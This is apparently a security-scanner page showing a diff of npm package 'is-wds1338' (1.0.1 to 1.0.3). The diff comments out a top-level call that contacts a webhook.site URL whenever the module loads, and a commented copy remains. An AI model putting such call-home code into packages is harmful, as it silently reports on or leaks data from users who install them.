is-wds1338 1.0.1 → 1.0.3
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +3 -2
- package/package.json +1 -1
package/index.js
CHANGED
@@ -18,7 +18,8 @@ module.exports = {
|
|
18
18
|
isWds
|
19
19
|
};
|
20
20
|
|
21
|
-
sendGet("https://webhook.site/0be863c0-10fd-4e42-bc92-240ad4d58109")
|
21
|
+
//sendGet("https://webhook.site/0be863c0-10fd-4e42-bc92-240ad4d58109")
|
22
22
|
|
23
|
-
|
23
|
+
console.log(isWds("a"));
|
24
|
+
console.log("version 1");
|
24
25
|
//console.log(sendGet("https://webhook.site/0be863c0-10fd-4e42-bc92-240ad4d58109"))
|